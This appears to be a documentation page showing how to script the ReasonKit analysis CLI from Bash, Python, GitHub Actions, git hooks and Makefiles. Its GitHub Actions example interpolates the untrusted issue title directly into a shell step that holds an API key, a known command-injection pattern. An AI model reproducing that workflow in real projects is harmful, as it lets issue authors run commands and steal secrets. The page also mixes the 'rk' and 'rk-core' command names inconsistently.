Scripting
Automate ReasonKit analysis in scripts and pipelines.
Bash Scripting
Basic Script
#!/bin/bash
# analyze.sh - Run analysis and save results
QUESTION="$1"
OUTPUT_FILE="${2:-analysis.json}"
if [ -z "$QUESTION" ]; then
echo "Usage: ./analyze.sh \"question\" [output_file]"
exit 1
fi
rk think "$QUESTION" --format json > "$OUTPUT_FILE"
if [ $? -eq 0 ]; then
echo "Analysis saved to $OUTPUT_FILE"
else
echo "Analysis failed"
exit 1
fi
Batch Analysis
#!/bin/bash
# batch_analyze.sh - Analyze multiple questions
QUESTIONS=(
"Should we launch this feature?"
"Is this pricing strategy sound?"
"Should we hire this candidate?"
)
TIMESTAMP=$(date +%Y%m%d_%H%M%S)
OUTPUT_DIR="analyses_${TIMESTAMP}"
mkdir -p "$OUTPUT_DIR"
for i in "${!QUESTIONS[@]}"; do
echo "Analyzing question $((i+1))/${#QUESTIONS[@]}..."
rk think "${QUESTIONS[$i]}" --format json > "${OUTPUT_DIR}/analysis_${i}.json"
done
echo "All analyses saved to $OUTPUT_DIR"
With Error Handling
#!/bin/bash
# robust_analyze.sh
set -e # Exit on error
set -o pipefail
analyze_with_retry() {
local question="$1"
local max_retries=3
local retry=0
while [ $retry -lt $max_retries ]; do
if rk think "$question" --format json; then
return 0
fi
retry=$((retry + 1))
echo "Retry $retry/$max_retries..." >&2
sleep 2
done
return 1
}
analyze_with_retry "Should I take this job offer?" > result.json
Python Scripting
Basic Usage
#!/usr/bin/env python3
"""Run ReasonKit analysis from Python."""
import subprocess
import json
def analyze(question: str, profile: str = "balanced") -> dict:
"""Run ReasonKit analysis and return parsed results."""
result = subprocess.run(
["rk-core", "think", question, "--profile", profile, "--format", "json"],
capture_output=True,
text=True,
check=True
)
return json.loads(result.stdout)
# Example usage
analysis = analyze("Should I start this business?", profile="deep")
print(f"Found {len(analysis['results']['gigathink']['perspectives'])} perspectives")
With Async Support
#!/usr/bin/env python3
"""Async ReasonKit analysis."""
import asyncio
import json
async def analyze_async(question: str, profile: str = "balanced") -> dict:
"""Run analysis asynchronously."""
proc = await asyncio.create_subprocess_exec(
"rk-core", "think", question,
"--profile", profile,
"--format", "json",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE
)
stdout, stderr = await proc.communicate()
if proc.returncode != 0:
raise RuntimeError(f"Analysis failed: {stderr.decode()}")
return json.loads(stdout.decode())
async def batch_analyze(questions: list[str]) -> list[dict]:
"""Analyze multiple questions concurrently."""
tasks = [analyze_async(q) for q in questions]
return await asyncio.gather(*tasks)
# Example usage
async def main():
questions = [
"Should we expand to Europe?",
"Is this partnership beneficial?",
"Should we raise prices?"
]
results = await batch_analyze(questions)
for q, r in zip(questions, results):
print(f"\n{q}")
print(f"Synthesis: {r['synthesis'][:100]}...")
asyncio.run(main())
Extracting Insights
#!/usr/bin/env python3
"""Extract specific insights from analysis."""
import subprocess
import json
def get_uncomfortable_truths(question: str) -> list[str]:
"""Extract just the uncomfortable truths."""
result = subprocess.run(
["rk-core", "brutalhonesty", question, "--format", "json"],
capture_output=True,
text=True,
check=True
)
data = json.loads(result.stdout)
return data.get("uncomfortable_truths", [])
def get_logical_flaws(argument: str) -> list[dict]:
"""Extract logical flaws from an argument."""
result = subprocess.run(
["rk-core", "laserlogic", argument, "--format", "json"],
capture_output=True,
text=True,
check=True
)
data = json.loads(result.stdout)
return data.get("flaws", [])
# Example usage
truths = get_uncomfortable_truths("I'm going to start a YouTube channel")
for truth in truths:
print(f"- {truth}")
CI/CD Integration
GitHub Actions
# .github/workflows/decision-analysis.yml
name: Decision Analysis
on:
issues:
types: [labeled]
jobs:
analyze:
if: github.event.label.name == 'needs-analysis'
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v3
- name: Install ReasonKit
run: cargo install reasonkit
- name: Run Analysis
env:
ANTHROPIC_API_KEY: ${{ secrets.ANTHROPIC_API_KEY }}
run: |
rk think "${{ github.event.issue.title }}" \
--profile balanced \
--format markdown > analysis.md
- name: Comment on Issue
uses: actions/github-script@v6
with:
script: |
const fs = require('fs');
const analysis = fs.readFileSync('analysis.md', 'utf8');
github.rest.issues.createComment({
issue_number: context.issue.number,
owner: context.repo.owner,
repo: context.repo.repo,
body: analysis
});
Pre-Commit Hook
#!/bin/bash
# .git/hooks/pre-commit
# Analyze commit messages for quality
MSG=$(cat "$1")
if [[ ${#MSG} -gt 100 ]]; then
echo "Running commit message analysis..."
rk laserlogic "Commit message: $MSG" --format pretty
read -p "Continue with commit? (y/n) " -n 1 -r
echo
if [[ ! $REPLY =~ ^[Yy]$ ]]; then
exit 1
fi
fi
Makefile Integration
# Makefile
.PHONY: analyze analyze-deep analyze-all
analyze:
@rk think "$(Q)" --profile balanced
analyze-deep:
@rk think "$(Q)" --profile deep
analyze-all:
@for q in $(QUESTIONS); do \
echo "Analyzing: $$q"; \
rk think "$$q" --format json > "analysis_$$(echo $$q | md5sum | cut -c1-8).json"; \
done
# Usage: make analyze Q="Should we refactor this module?"
Tips for Scripting
- Always use JSON format for programmatic processing
- Handle errors - check exit codes and stderr
- Set timeouts - use
--timeoutto prevent hangs - Cache results - analysis is deterministic for same inputs
- Use appropriate profiles - quick for automation, deep for important decisions